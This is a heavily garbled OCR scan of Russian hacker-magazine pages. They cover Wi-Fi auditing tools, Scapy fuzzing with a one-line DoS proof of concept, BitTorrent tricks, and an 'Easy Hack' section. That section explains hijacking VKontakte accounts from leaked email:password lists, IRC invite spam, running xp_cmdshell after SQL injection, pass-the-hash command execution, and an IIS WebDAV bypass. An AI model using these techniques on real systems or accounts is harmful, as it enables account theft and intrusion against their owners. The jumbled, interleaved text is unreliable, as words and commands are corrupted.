за,~еняет на plassword и т.д.)
сервера, который по Уlo10лчанию поднимается
зрительные пакеты, высокая загрузка сети
на
или неизвестные адреса. Словом, вам отлич
127.0.0 1:8000.
~Iая программа для винды за исключением
COMMVIEW FOR W'1F.1
www.tamps.ru ,. products/commwlfl Специальная версия известного виндовоrо снифера
CommView, созданная для захвата
одного
-
она платная.
~1~~~i~~~fY~~~tlц t il sl wlreLess_key.htmL
Уже са м не раз сталки вался С
WIRELESS AUDIТOR
SECURIТY
собственной Точки доступа. Кажется,
www.elcomsoft.ru
это была строчка из Лермонтоеа? Черт,
и анализа сетевых пакетов в беспроводных
Еще одна платная, но очень любопытная
или Пушкина? Не помню
сетях 802 l1a/bIg/n. Утилита получает инфор
разработка
освежить
Wlreless Sесuпtу Audltor
паlo1ЯТЬ
позволяет проверить надежность (да,
и сразу декодирует анализируемыеданные,
теперь ато так называется'
отображая их G удобном для переваривания
WPA2, но используя современные Io1ETO
WPA
виде. В случае необходимости, пакеты можно
ДИКVI для вычислений
работает как с сервисом
дешифровать с использованием пользова
фических процессоров.
тельских ключей
режиму,
WEP
или
WPA-PSK
и деко
дировать вплоть до самого низкого уровня
ХАКЕР Qb
1126/ Q9
дится
когда
С помощью
гра
В дополнение к
восстановление
средствами
WPA!
только
ПрОИЗEiО
центрального
Моментально
помогает утилита
мацию от беспроводногосетевого адаптера
.JI
cVlTya
цией, когда тупо забываешь ключ от
WlrelessKeyView. которая ebITacKVlBaeT из реестра сохраненные в системе WEP! ключи, Приятно, что
WlrelessKeyVlew Wlreless Zero
Conflguration в W,nXP, так и WLAN AuloConflg, Висты.
KOTOPЫ'~ пользуются юзеры
I
~
027
5[АРУ
х
х
х х
J
5[АРУ
х
х
5[АРУ
xEEi8 СТЕПАН «ST~» И~,~~Н
~АБОТА
ХEEi8
J
х
еоеКАЛЬПЕЛЕМ РАЗБИРАЕМСЯСУТИЛИТОЙSСАРУ Как можно воплотить снифер, фазер и конструктор пакетов в одной утилите? Создатели Sсарудоказали, что это возможно. Работа через текстовый интерпретатор, возможно, испугает большинство пользо вателей. Но мы, освоив простой синтаксис, сможем ей одной заме нить множество специализированныхутилит.
Как среагирует на такую подставу демон? А как клиент? В
0001 Ether / rcquest
О
IP /
ICMP 192,168.5.21 echo
/ Raw
при~щипе некорректные значения можно f'lодставлять и
~
links
• в е рсия SCQ ру для
IЗручную, однако для большего удобства в Scapy реализо
Обрати внимание, что отправку па кетоlЗ и снифинг можно
вана функция fuzz[), которая преобразует любой коррект,
провести всего один раз, а отваты и резупьтат снифинга
ный пакет в пакет, специально заточенный для фаззинга.
присвоить переменной, после чего делать с кей все что
Фишка в том, что функция автоматически заменяет все
угодно. Столысо раз -
поля [кроме случаев. когда значение поля должно быть
I~ИНИМУМ активности, которая кас может спалить, и макси
мум возможностей по интерпретации
например, поля с КО~IТРОЛЬНЫМИ суммамиl
сколько потребуется. Получаем
IPv6:1.1..9.-n:blpiiru.
подсчитано -
hrшgо.widе.аd.jр/
случайными значеliИЯМИ, но подходящими по размеру
перехваченные пакеты мы помещаем в массив а, и теперь
~
для этого поля, Разберем при мер:
можем обратиться к пюбому па кету, просто указа в его
8
нашем примере
индекс к примеру, а[1]. Метод пsummагу[l, как видишь,
• Uпit-тестирование
»> send (IP (dst=" target") / fuzz (UDP () /
выводит общую характеристику перехваченных пакетов.
для Scapy: secdev.org!
N'ГР
Перехваченные данные в некоторых случаях удоб
("ersj.on=4) ) , 100р=1)
RIQj.~_c;ts!UTsca ру.
нее просмаТРИВдТЬ и анализировать в удоБНОl4
в этом случае IР-слой будет самым обычным, в то время как дЛЯ
интерфейсе того же
GUI
Wireshark·a. Для этого перехвачен
• Инжектирование
UOP и NTP [это, кстати говоря, протокол сетевой синхронизации
ные пакеты рекомендую сохранить в файл в формате
паl<етов в Wifi:
времениl будет использовать фаззинг. Причеl~ контрольная
РСАР: wrpcap(<
sid .rstack.org!indg~
сумма в UDР'пакете будет корректной, в Кдчестве порта будет
ществляется так. pkts
®..QLw.ilitQQ EN.
использоваться порт 123 [стандартный дЛЯ NTPI, а версия NTP
=
rdpcapl«lemp.cap»I.
будет установлена на 4 [Т.к. она явно задана при соэдании паке
РАЗ ПЛЮНУТЫ
та!. Остальные поля будут заполнены случайными значениями.
Самая главная фишка Scapy в том. что она позволяет обойтись без написакия новой утилиты. Если для напи
СНИФИН:Г
сания Proof of еопсерt для DoS'a MicrosOft'OBCKOro стека
Не даром мы устанавливалиWiпРсар и модуль для работы
IP требовалось 115 строчек на С, то в Scapy это можно
с ним: В
реализовать всего лишь одной строкой:
Seapy реализованы отличные возможности для
снифинга данных. Основная функция - snift 1], в качестве параметров которой можно указать интерфейс для про
send(IP(dst="target",options="\x02\
слушки, задать фильтр и количество па кетов для перехва
х27
" +" Х" * 3 8)
/ТС1? ()
)
та. Если интерфейс не указан, снифинг производится по всем интерфейсам сразу. Вот так просто fЮЖНО перехва
С помощью Scapy реально сотворить все, что угодно Хочешь
тить IСМР-трафик, связанный с ХОСТOI166.35 250.151:
сканер портов с нужной тебе логикой
- легко добавить
возможность flпgегргiпt'а? Раз плюнуть. А впрочем, почему
»> sniff(filcer="i.cmp
апd
hosc
соuщ=2)
батывая пакеты, можно легко сварганить уникальную IDS
<Sпiffеd:
ТСР:О
систему с триггераl1И на любые события. И самое главное
»>
UDP:O
ICMP:2 Other:O>
сделать это очень просто. Скажу больше -
а=
0000 Ether / requesC
032
О
IP /
/ Raw
никто не обязыва
ет тебя постоянно работать череэ интерпретатор. Seapy очень
»> a.nsummary()
~
использовать его только для пентеста? Перехватывая и обра
66.35.250.151",
ICMP 192.168.5,21 echo
просто подключить к своему Pythоп-сценарию как модуль и
использовать все ее возможносги на всю катушку! I
ХАКЕР
06 /1201 09
Что объединяет Гарри Поттера и Джонни Деппа7 Героев мультфильма «Ледниковый период» и ретро-боевика «Джонни д» 7
в каЖДОМ номере
DУD с полнометражным
фильмоМ
Все они ждут тебя
в юбилейном номере
100-ый номер журнала
Total DVD!
Total DVD
. www.totaldvd.ru
в продаже с
24 июня
ДЕСЯТОК CEKPE~OB
о КОТОРЫХ ТЫ НЕ ЗНАЛ
:
Скачать «горяченький» файл -
подчас не такая простая задача.
Обычные хостинги мрут, как мухи, не выдерживая нагрузки, файлоб менники жадно клянчат деньrи, а FТР-серваки не дают слить файл из-за ограничения по количеству пользователей. И только через
BitTorrent можно не только закачать вкусняшку, но и сделать это мак симально быстро. Еще большего удобства ты добьешься, воспользо
.
вавшись нашими советами
•
Сегодня мы не будем говорить о банальных
скачать только через tоггепt. Такие фай~ы
способ проще. Слить нужный файл черезторрент
~. Новые серии сериаловтеперь под силу
обычно по разны;~ причинам быстроудаляются
подсилуодному лишь браузерувкупес онлайн
даже домохозяйкам, по картинкам установив
с ХОСТИI~ГОВ и файловых обменников. Да и просто
инструментом BitLeHv"""i'V.bltlel.orgJ. Это очень
шим какой-нибудь торрент-клиент. Намного
обезумевшая свора пользователей нередко
ПРОстой сервис надолишь скопироватьлинк
интереснее разобраться, какуправлятьзакач
вал,псервер или полностью расходуетеголимит
ДЛЯ торрента в единственное на странице поле,
ками с мобилы, получить аккаунты на приватных
потрафикуу хостера. Дома ничто не мешает
нажать на кнопку
трекерах и автоматически скачивать свежие
воспользоваться любимым клиентом (напри
брать папку для сохранения файла на локальном
дистрибутивы программ. Вот эти м и зай~~емся I
мер, uTorгentl, но сам лично не раз стал кивался
диске. В большинстве случаев, началозакачки
«Download torrent" и далее вы
с ситуацией, mгда файл кровь из носа нужно
не заставит себя долго ждать. Секрет работы
ОБХОДИМСЯ БЕЗ КЛИЕНТА
было скачать из совершенно левого места. Как
сайта в специальном Jаvа-апплете, который и
Все чаще начинаю замечать. что некоторые
вариант, на машине можноустановить порти
выполняетфункции Тоггепt-кгиента Но отсюда
эксклюзивные вещи становится возможн ым
руемый кгиент. которых большинство, но есть
же возникает и единственноетребование. необ
~
034
ХАКЕ'Р
.
06 /126/ 09
)
'О.'О
~,iltl
...
@/(;->== .I~
-. =-- ._0 :.
.. .
.
изтор
РЕНТОВ ПРЯМО ЧЕРЕЗ ЛЮБОЙ ВРДУЗЕ::Р
~
-
-- ,..
."
-::;. ю,.
""
"",~
-:'..
...
-:='";;;;;;;';
,"'.~
~;...,:..-
1:':: 1- ;
г----------------------il 'l ! ходи~ю позаботиться,чтобыдnятвоего браузера
бып установпен плагин Java VM.
ТВОЙ ИН
•• РЕГИСТРИРУЕМСЯНА ЗАКРЫТЫХТРЕКЕРАХ
ВАИТ НА ЗАКРЫТЫЕ TPEKEPbl
Ни для кого не секрет, что дnя регистрации на закрытых торрент-трекерах нужны инваЙты.
Имея не очень широкий канал, мне удобнее
Взять хотя бы легендарный Demonoid Только
закачиватьфайлы в момент моего отсутствия
где эти инвайты взять, еслv.друзья о таких
регистрироваться Кстати говоря, дпя обмена
сервисахдажене СllышаllИ На самом деllе,
инвайтами есть даже специаllизированный
ми приходитсяудаllенно. Конечно, ничто не
попностью приватнытреJсерыы- большая
ресурс - wwvueroRaid.com.
ограничивает в ИСПОllьзовании обычного
трекеров открывают свободную регистрацию в
РАБОТАЕМ БЕЗ ТРЕКЕРА
привязанным к компьютеру. К счастью, есть
опредеllенные дни недеllИ v.ли даже оnреде
Увы. но трекерызачастую оказываются недо
способ вообще избавиться от каких-либо
пенные часы. Уследить за этим довольно
ступными. Крупных и извеСТНЫХТр9.сутправо
ограничений, установив для своего клиента
обладатели, неБОЛЬUJие и при ватные банально
веб-интерфейс Одним из самых распростра
метод вручную заходить на сайт 8 надежде,
оказываются недоступ ными из-за проблем с
ненных вариантов является связка нашего лю
что вот-воттам откроется регистрация. Не
хостингом. Сам протокол BitTorrent подразумевает
бимого uTorrent и специально разработанного
буду говорить по поводу того, ЧТО можно на
обязатеllьноеучастиетрекера, но клиенты разви
веб-интерфейсаWebUI [htl[J//lогum.Ulоггепt.
писать простенький скрипт. КОТОрЫЙ сам все
ваются настолько быстро, чmуже сами придумали
com/vie\'IIforum.ph[J?id=20J. ДIlЯ установки надо
автоматически будет проверять Но нескажу
дополнения для протокола. Так что Кilиенты могут
лишь распаковать архив с ПОСllедней версией
лишь потому, что уже давно сделали за нас
работать вообще без трекера. Если в опциях
WebUI прямо в папку u Тоггепt'а и далее ВКIlЮ
R РD-клиента, но 1уТ ты опять оказыва ешься
редкость. Многие изтаких вот закрытых
тяжело, муторно
-
в КОl1це концов, не наш этот
дома Поэтому зачастую управпять закачка
программы естьуказание на DНТ -считай, так
чить
\Nvvw.o[Jentrackers.lr. Первый очень простой:
оно и есть. DНТ [DistribuLed Hash ТаЫе. распре
руешь веб-клиент соответствующей галочкой,
скорее всего, какой-то rv.K
деленная хэш-табllицаJ работаетдnя разных
тебе предложат ввести логин
р2р-технологий, но конкретно Кilиентам 8itТоггепt
ДОС1упа, сделать гостевую учетку, а также за
позволяет обойтись вообще без трекера. Ины"и
дать порт, на котором клиент будет принимать
создатели сервисов
Trackerchecker.org и ero сделаll для себя,
а после OTKpbIll для всех желающих. Совсе" другое дело
- opentrackers. Тутты не только
ero в настройках. После того, какактиви
v. парольдля
можешь узнать о состоянии регистрации
словами, Кilиент сможет найти nИРОВ,даже если
подключения
нужныхтебетрекеров[а заодно и открытьдля
трекер отключен или даже никогда не существо
чтобы обратиться к веб-интерфейсу, доста
Вот, собственно, и все: теперь,
себя кучу новых], но и посмотретьконкретную
аал. Кроме топа, l'Oрренты можно размещать без
точно набрать в адресной строке httр//<твой
статистv.купо каждомуv.з них, А чтобы не про
трекера. Утакого развития Кilиентов есть и ложка
'р>.<указанныЙ в настройках порт>/gUI/
пустить «счастлv.выечасы", тебе предлагается
дегтя. в виду отсутствия стандарта нет единого
Неважно, откуда ты будеwь попьзовать веб
подписаться на общий для всехтрекеров
понятия 01"ОМ, какдолжна выглядеть таблица
v.нтерфеЙсо", неважно какой браузер будет
RSS-фид,либо на фид по KOHKpeTHO'~yресурсу
DНТ В результате, в нашем любимом ~Тогneпl ис
использоваться
Если присмотреться,то рядом с наиболее по
пользуется та же реализацv.я DНТ. что и в МаiП\lпе
можешь хоть через мобv.льныl~ браузер теле
пулярнымитрекерами есть небольшая иконка
и BIIComet, но, увы, несовмесгимая с Azureus. В
фона [npoBepeHo на Opera Мiпil Не эабудь
[например,у Demonoid'a v.IlИ f'ileList orq), по
любом случае, поддержкуDНТ в своем Кilиенте
пробросИ1"Ь порты, если используешь маршру
которой можно перейти на сайты для обмена
необходи~ю ВКilючить в обюательном порядке.
тизатор и разрешить входящие подключения
приглаUJеНИ>lМИ Обычно эти IlИНКИ ведут на ветки каких-то форумов, поэтому для запроса приглашения придется предварительноза-
УДАЛЕН НО УПРАВЛЯ'Е~М
ЗАКАЧКАМИ ЧЕРЕЗ ВЕБ
-
управлять закачками ты
для нужного порта в фаЙрволе. Для большего удобства реко,~ендую обзавестись записью
в каком-нибудь DупDNS-сервисе (например, dуПdпs.соm], чтобы вместо своего IP вводить что-то mоilоггепt.d пdПS.соm.
Несколькополезных
Должен признать, что последняя версия WebUI
сервисов
вышла еще в 2008 году и содержит HecKollbKO
• Сколько раз, скачав довольно большой файл, ты обнаруживал, что этот вовсе не во
проектбез развитv.я долго оставаться не мог.
неприятных ограничений
Впрочем, такой
жделенная программа, а какой-то непонятный фейк? Врядли многим приходит в голову
Сейчас активно продвигается модификация
просто нагадить, а вот поднять рейтинг за счет якобы ценного файла горазды многие.
WebUl WIP, версия для удобного просмотра с
Огородить себя от подделок просто: достаточно предварительно проверить подлинность
мобильных устройств u Тоггепt МiпiUI, а также
файла, скормив его хэш (а он обязательно прописан в .tопепt) специальному сервису
ряд других проектов. ссылки на которые ты
\\'\ \'\~JSlI1·_ellrsp.1 т. (0111 .
найдешь в сноске.
• Инструментовдля удобного поиска по торрентам рунета не так много. Зато есть за мечательный сервис Baratro (I):I!" 11', '. ПJ), которыйИНдексируетторрент-файлы со многих
JABBER И BITTORRENT
друтихтрекеров,в том числе и закрытых,и предоставляетвозможностьбыстроискать
Конечно. веб-интерфейс - зто вовсе не
нужные файлы, забыв о проблемахрейтинга.
уникальная фишка uTorrent. Если говорить о популярном никсовам И маковском Кilиенте
ХАКЕР
06/126/09
I~
035
г::=~::::-;;~~-~ 00" ~ ".'''~'.-.----------=
L~L"--~ll
~~...
))(~~ :-6~;
;:::
=
~-~-.~~~:-~~-.~~~.;,,..,s. 5:..\3.
$'StfII. СЭIOOJl
5-..
~
. '
. • •
.
~ ~
~.:: ~~~ ;:-~)~ ::~ l.~JGI) ~т.!CZ;
~A'"
m.~,.
~
::6..~~~1S
:O:n~.,.
Sor~
s.,;Of,W
"-'О.G'to
..
!'!А --~;;,;-___;:;:..-
'
warning
Несиотрянадурную славу,
-
BitTorrent
это лl-tшь распре
деле), ная сеть для
обмена Файламl-t_
URЕМОТЕПОЗВОЛЯЕТУ~АЛЕННQУПРАВ
Но надо ПОНИ'1аТЬ,
• •• •
что, l-tспользуя его для загрузки вареза
или пиратской вер
ЧТОБЫ НЕ КАЧАТЬ ВСЕ ФАЙЛЫ ИЗ RSS
сии фильма,
ФИДА, НАДО НАСТРОИТЬФИЛЫРЫ
ты нарушаешь закон.
KOef1
•
•
подписку В общем-то, большую часть работы в этон случае выполня ют сами ресурсы, которые генерируют контент для этих
Автор и реда кцl-tя зто НИ В
•
ПЯТЬ
самых фидов Особенно часто 8стречаются RSS-фиды с еже
отправляет сообщен ия оэавершенн ыхзагрузках на любой
а также дополнения
Jabber ID
к Hl-tМ.
-
Python
Однако на,1НОГО интереснее другая ее возможность
управленl-tе Тоггепt'аМl-t с помощью простых команд череэ
Ilttg:/i
k U ID и
паролем на нужный TpeKepl8oTTaK: httр:l/некиЙ-торрент-саЙт.соm/гss,рh р С О О КI E:ui d-O 1'gas s~(jwertysdf354scdfg2
JаЬЬег-сообщения. Можно отправить своему кл иентусообще
Если говоритьо uТоггепt, то грех не воспользоваться встро
ние вроде «add hltр:/illПklllпk» - l-t DеlLJgедобавит новую
ен ной системой фильтроs, которая настраl-tвается через
закачку.IМ-КЛl-tентееть практически у каждого нателефоне,
Downloader [вызывается горячей кнопкой Ctrl-RI Для каждого
и почти все они, помl-tмо пресловутой
фl-tльтра можно указать словосочетан ие, которое должно
aCbKl-t, начl-tнают
под
держивать множество других протоколов и, конечноже,
Jabber
RSS
sстречаться или, наПРОТИ8, не 8стречаться, причем допуска
ются служебные сим волы' и *, приоритет AJlЯ Н08ЫХ закачек
ПОДПИСКА НА ТОРРЕНТЫ ПО
RSS
и папку для загрузок. Важно, что тут не l-1аАо указывать номер
Самый классный способ автоиаТЮl-tроватьэакачку некоторых
серии илl-t сезона lопятьжеупор на эакачкуименно cePl-tалов),
файлов
Т;С это нарушит работу фильтра. Для указан ия этих параметров
-
подгружать ссылки на tоггепt-фа йлы через
RSS
ес,ь отдельное поле с конкретным шаблоном, рядом же можно
НАСТРАИВАЕМ ШЕЙПЕР: ТЕПЕРЬ ПОЛНАЯ ШИРИНА КАНАЛА БУДЕтдоеТУПНАUТОRRЕNТТОЛЬКОГЛУБОКОЙНОЧЬЮ
. . G.......1
rjг
UI settings
!-·DitectQries
, 1·- Connection
I 1·- Вand",dth
1
~Scneduler ;-.. \~,reb ur
I (~-
Adv.nced
И все-таки. получается довольно-таки огранl-tченная автоматизация:
мы напрямую зависим отех, кто соэдает
RSS-фl-tды. Что делать, еСЛl-t подписки для интересующего
•
нас контента банально нет' Вот тут-то нам и поможет уже
знакомый инструментУаhоо Pipes [pipes,yar,oo.cQm], Этот
o Еn.ы. S<:h.dul.,.
замечательный сервис позволяет обрабатывать раэличные
Schedulerl'O!IbIe
источнl-tкl-t данных [RSS-фиды, любые HTML-страl-JичкиJ,
~ 8itTorтent"
!." QUfue:ing
указать и требуемое качество IDVDRIP, Н DТV итд,!.
фильтровать полученный контент, выделять из него нужные
I
I
данные и получившийся поток информациl-t оформить
I
8
виде обычного RSS-фида. А поскольку настройка «водо
I
провода» выполняется с помощью графl-tческого l-tнтер
фейса, то можно очень быстро сварганить готовую подписку
I
DTumoff [;JLimit~
О Seeding only
S
r~te (kВIs):
dO·....ТlloO!ld
I------------~~---
r~te
(kB/-s):
o OisO!lbIe ОНТ whEn tuming off
с совершенно любой l-tнформацией, в том чl-tсле И ссылка'1И на интересующие тебя торренты. То, откуда ты l-tХ будешь брать и по KaKO~~y Прl-tнципу отбирать, зависиттолько от
тебя. Ч-roбы быстрее BHl-tКНУТЬ в водопроводные дела, реко мендую тебе статью "Интернет на ОДНОЙ странице» из
номера I
11 О
(РDF-версия будет на нашем дискеl.
АВТОМАТИЗИРУЕМ ЗАКАЧКИ Есть еще несколько способов автоматизировать за качки. В том числе и на удаленной иаШl-tне, Напрl-tмер,
~R·~·~~РУБАдЛяГРАББИНГАЛИНКОВНА СВЕЖИЕ СЕРИИ ПОПУЛЯРНОГО СЕРИАЛА
Dоvщ:
218.2 K8{s
. ,
1,·
очень удобно на хоете с широким канаnом и работаю щими tоггепt-клиентом расшарить папку И сделать так,
з Toггents
чтобы прога автоматически подхватываnа 8се ПОЯ8ЛЯЮ
~ Ratio: 0.04
TRANSMISSION ДЛЯ
щиеся там ,tоггепt-файлы Помнится, в С80е время Я
.. 1.72 MB/s
.. 180.9 KB/s
МАКА И ТУКСД
даже ПViсаn простенький Регl-скипт. который запускаnся каждые пять минут через пnанировщик I~
проверяn пап
ку на обновление, скармливая появившиеся торренты на
мапо, В России трафик чаще режут на уровне организации,
скачку кnиенту Доступ к зтой папке был у моих друзей, и
чтобы сотрудников не сипьно баловать халявным инетом,
они очень просто могли 80СnОnЬЗ0ваться моим каналом,
Обойти такие ограничения не просто. но можно, Достаточно
просто скопировав в эту папку нужные торренты, а потом
очевидный способ
спить закачанные файлы по специально открытому для
могли разобрать, какие данные и каким образом переда
них ПР,
ются пользователем, Трафикдля этого можно пустить через
Чуть позже ПОЯ8ИЛСЯ дедик на винде и оказаnось, что
шифрованный туннель, но это зачастую дорого [например,
- сделать так, чтобы провайдеры не
автоматизировать это можно прямо средствами uТоггепt,
в сnучае nnaTHoro VРN-сервиса) иnи медленно [в случае
• о том, как само
Надо лишь в разделе "Другие настройки» включить опцию
беспnатного варианта на базе Toro же Тог'аl Однако в
~~y поднять С80Й
«Автозагрузка файnов .tоггепt» и задать папку для загрузки
нашем сnучае необяза-rеnьно решать пробnем «в лоб»,
торрент-трекер, ты
Правда, по умолчанию клиент наЗОЙnИ80 будеттреб08ать
Возможность шифрования трафика на основе простого
~~ожешь прочитать
путь для сохранения закаЧи8аемых фаЙЛ08, но и зто можно
апгорип~а
8 #114у
побороть, указав нужную папку
протокопа IPгotocol EncryptlOn], впервые реапизованное
статьей мы выложили
мыефайлы в», Чтобы не спутать старые файnы с новыми, все
в проге
на диске,
обработан н ые торренты
г,рапически всеми клиентами и включается без лишнего
8 попе "Помещать загружае
uТоггеп! помечает расши рен ием
RC4
появилась в самих кnиентах Шифрование
BltComet еще в 2аО5 году, теперь поддерживается
POF-куСО
геморроя устаН08КОЙ нужной галочки в настройках, Если
• Раз уж мы за 1'080
взять UTorrent, то шифр08ать трафик он умеет 8 нескольких
рипи о веб-оболочках
ОБХОДИМ ЗАЩИТУ ПРОВОВ
режимах. для всех подключений, только для входящих,
для упра8ления
Колоссальны й объем трафика, про качивае~шй через
тоnько для исходя щих И Тд,
закачками, не могу
BitTorrent, конечно, не СИЛЬНО нравится провайдерам,
Реально обойти и другие ограничения, Если корпора
не упом~нуть раз
В н екоторых странах п ровы охотно начина ют бороться с
тивный файрвоn режет трафик по конкретны м портам,
работку
р2р-сетями и ограничиваютсоединения, ссылаясь на то,
то в кnиенте можно попробовать установить другой порт.
[torrentflux,com]
что через торрент [8нимание l ] может передавать варез,
В конце концов, тот же
Это торрент-клиент,
Отмазка, конечно, неплохая, но ПОЛЬЗ08ателейутешает
прокси или саксУ
,torrent,Loaded,
uTorrent отлично работает через
TorrentFLux
который поnноетью написан на РНР и довольно просто уста на вл ива ется на
LАМРхоетингпод никсами
• Привыкнув К
uTorrent'y, сложно
перейти на альтерна тивные кnиенты под
другими ОС Приятно, ДМ это й програ~~
мы уже сейчас есть бета-версия под Мас
05, а
под туксом она
отлично работает под
эмулятором
ХАКЕР
06 /126/ 09
Wine,
~
037
»
в=:лом
Easy Hack
Easy Hack
ХАКЕРСКIИЕ СЕКРЕТЫ ПРОСТЫХ
Eas Hack
ЛЕОНИД
"ROID" СТРОЙ кОВ
I RDIDraHAIL,RU I
ВЕЩЕЙ
АНДРЕЙ "SKVOZ" КОМАРОВ
MORO
I KOHAROVra ITDEFENCE.RU I
I HOROraINBOX.R.U I
ЗАДАЧА: ПРОЧЕКдТЬ СПИСОК
МЫЛЬНИКОВ НА НАЛИЧИЕ АККд УНТОВ «ВКОНТАКТЕ»
§'@БМIН"ММ
f~~:'- _1~_~_:_J~_~ Ц_ш._-_-~ _~ _-oi-'~
РЕШЕНИЕ: Социальные сети с каждым днем набирают все большую популярность.
I
Поэтому я даже не буду сп рашивать, зачем тебе могут потр ебо вать акки,
Сбор паролей от «ВКонтакте»
на пример, от \N'N'N.vkonta I\te.ru:) Собрать пару сотен подобных уч етн ых за пиceй зачастую просто необходимо, но как быть, если на руках имеется лишь
2.
внушительный маил-лист вида МЫЛО.пароль, который необходимо преоб
ника
В~6ираем список вида мыло: паропь, где паропь
-
пасс от м:ыль
разить в список ТИ па логи н :пароль ОТ "ВКонтакте» 1 Ре шение есть, и сейчас
з.
':IeKael'1
ятебе его представлю. Для осуществелния задуманного мы воспользуемс~
4.
Валидные МЫПЬНИКИ чекаем на наличие акков <'<ВКОНТакте)о)
утилой
5.
Ждем
MailWok,
которая предназначена для проверки мыл на наличие акков
"в Конта кте», а та кже для автоматического восста новления па рол ей и их
мыльники на валид
HeCKOJJbKQ
l"4И.Н)"Т
(пока на мыла рассыпаются письна С JЭос
СТдновлеННЫJoВ1 пассаии от социальной сети)
сбора с прочеканных ящиков. Прежде чем перейти к активным действиям,
б. Теперь жнем на баТТQВ <~Проверить мыла» и Бдем,
рассмотрим возможности софтинки:
соберет с ЯЩИКО8 письма
7. •
'Чекинг мьш на наличие аККОБ «ЕКонтакте»
•
Автоматический запрос на восстановления пароля от аККдунr:rа
I
пока тулза
пришедшие ОТ «ВКонтакте»
Сохраняем полученные акки
Теперь о возможных проблемах l Если пасс от "ВКоптакте» не пришел, зпачит:
«ВКонтакте»
•
Автоматический сбор писем с паролян:и от «ВКонтакте» с проче~
1.
Мыло не лрочекано на валид либо невацидаое
канных ИЫЛЬНИКОВ
2 •.~·jылО
•
з.
Автсиатическое удаление собранных. пиоем с носетановпением
не эарегано «БКонтакте»
AKKaYf':T
«Вl(oH'I'aKTe»
зареГYiстрирован,
но не активироsан
пароля
•
Поддержка ПОП'.fлярных почтовых сервисов
{mail.ru, rambler .П],
Как видишь, все довольно просто, но зффективно целую 5Д с учетками от
Если ты до сих пор не понял, о чем речь, то имеетсмысл ознакомиться с под
робным алгоритмом действий по решению поставленной задачи:
Однако не забывай, что за все свои
запрещено.
нашем ДВД ты найдешь нетолько утилу
MallWok, по
и сорцы, которые
были любезно предоставлены автором продукта
Слушаем уТ'илу с нашеrо двд
ЗАДАЧА:
w\I'iw.vkontakte.ru.
действ и я ты отвечаешь сам, а испол ьзо ван ие '1ужих аккаунто В кате гор ич ески
P.S, На 1.
При наличии времени,
желания и большой базы мыльных акков ты запросто сможешь собрать
уапdех.ru, есс)
НАБРАТЬ БОЛЬШОЕ ко
Л ИЧ ЕСТВО ЛЮДЕЙ НА I RC-КдНАЛЕ
Обрати 8нимание.
При превышении лm-штов инвайтов следуе1' переподключиться
РЕШЕНИЕ: Если ть! фанат
iRC,
Не Стоит собирать ники со служебных каналов
то раскрученныL:\ капал С обилием народа, ДЛR тебя
дело '1ести. Воттолько собраl'Ь внушительное количество людей не так-то
жизни
TBOe'I'O
(иначе минуты
канала сочтены}
При желании дропнуть чужой канал
просто Можно, конечно, рекламировать свой IRС-канал всеми возможными
-
достаточно rrpо:инвайтить
ники со служебlШХ каналов
:)
способами, однако есть гораздо более эффективный метод, о котором я тебе сейчас расскажу. Суть его заключается в автоматической рассылке
Пла вно перейдем к установкескрипта:
ин вайтов и попол не нии численности ка наЛОflдселен ия за счет в ключен
ного автоджойна при получении инваЙта. Ка к ты понимаешь, речь идет об
1.
Сливаем скрипт с нашеrо ДВД
автоматизированной доставке приглашений, поэтому знакомься -«Invlte
2.
О'гкрываен mirс-редснстор СКрИПТОВ
т;гс script Ьу elimS". Именно он поможет нам осуществить задуманное. Итак,
и внедряем через инъекцию! Теперь можно наспаждаться прак-rИ'1ески
неограниченным доступом к серверу. Ну а что делать дальше
2, Переконфиругируем сервер: f I
ехес
q не раз сталкивался с при
-
зависит
только от твоей фантазии,
P.S. В SOL Server 2000 xp_cmdshell также можно активировать, используя
reconfigure
процедуру sр_аddехtепdеdргос.
IN 81 о
--
_
ЗАДАЧА, УДАЛЕННО8ЫПОЛНЯТЬ
КОМАНДЫ, ЗНАЯ ТОЛ ЬКО ИМЯ
УЧ ЕТНОЙ ЗАП ИСИ И LM/NTLM
ХЕШ ПОЛЬЗОВАТЕЛЯ
passhash,html!. Для ее работы требуется библиотека GNU ТLSдовольно дpeBHe~1 версии
1 з.
ИспользоваТЬWlnехе проще простого
-
в перемен
ной окружения 5MBHASH должен находиться хеш в формате «LM:NTLM». который подцепится автоматом в процессе аутентификации. Если учена находится вдомене, между именем домена и именем учетки нужно поста
РЕШЕНИЕ:
вить 2 [1) обратных слеша.
Получив LM/NTLM хеши паролей пользователей,всегда возникает непреодолимоежелание как-нибудь их поюзать:] В принципе,
$ export
можно вооружи-rься Samln5ide и некоторым количеством времени
490саеЬ4.22fЗfа5а7аеб34
- и получить на i3bIxoAe пароль поnьзователя \но в случае NT хеша
от М$, которые до сих пор используются повсеместно, имеется
жешь использовать PSH
одна особенность -
и
для успеШI:IОЙ аутентификации знать пароль
Toolklt
msvctl. Однак.о PSH Toolklty
необрзательно. При аутентификации клиентиспользуетвели'1ИНЫ,
меня запускаться отказалась
вычисленные с использованием хеша учетной записи, а также
-
сессионного ключа, полученного от сервера !чистый хеш не пере
ная версия бибnиотеки
дается во избежание его даnьнейшего повторного испольэования
dll, которую мне достать не
В случае перехватаl.
удалось, а
Для решения задачи можешь воспользоваться пропаТ'1енной верси
зал ась аутентифицироватьсяв
ей wiпехе - аналогом виндовской psexec для никсов IfoofLls.rlet/jmk/
ХАКЕР
06/126/09
Выполнение ipconfig и удаленной машине
whoami
на
ей нужна какая-то особен
домене.
m5vctl
lsasrv.
наотреэ отка
I
~
041
»
tЬ ~
В::ЛОМ
Jj
ОБ3'ОР
зксплоuтов
1\
ill
~~~
~
ОБ='ОР зксплоuтов
~
оsзор
3КСПЛQUТОВ
ОБ3'ОР
зксплоuтов
Jj ~
АНДРЕЙ .SKVOZ. КОМАРОВ
,.
\
~
~
~
ОБВОр зксплоuтов
~ ~
~
/[]~~[!J~/EKSPLOITOV Летняя пора -
время отдыха. Как бы ни так, когда речь идет об уязви
мостях! Соревнования между«злоумышленником» и «защитником»
[применительно к нашему времени - междухакером и вендором) про должаются. Число брешей неизмеримо растет К сожалению, все осве тить никак не получается, поэтому в этот раз я подготовил на обозре
ние наиболее важные.
01
ОБХОД ОГРАНИЧЕНИЙ
недоступна на чтение «извне" или жезащищена паролем, ОбращеН~lе
В МIСRОSОFТ115 6.0
к файлу относительно самого хоета: sесгеthоst.гu/sесгеt/sесгеt.ziр. Для
WEBDAV
обхода огран"чений посылаем GЕТ-запрос вида:
IJИI
GET /
Изюминка зтого класса атак в том, что возможность «забрать» искомое с
'I'rапslаtе:
сервера существует абсолютно безразлично по отношению к за щищен
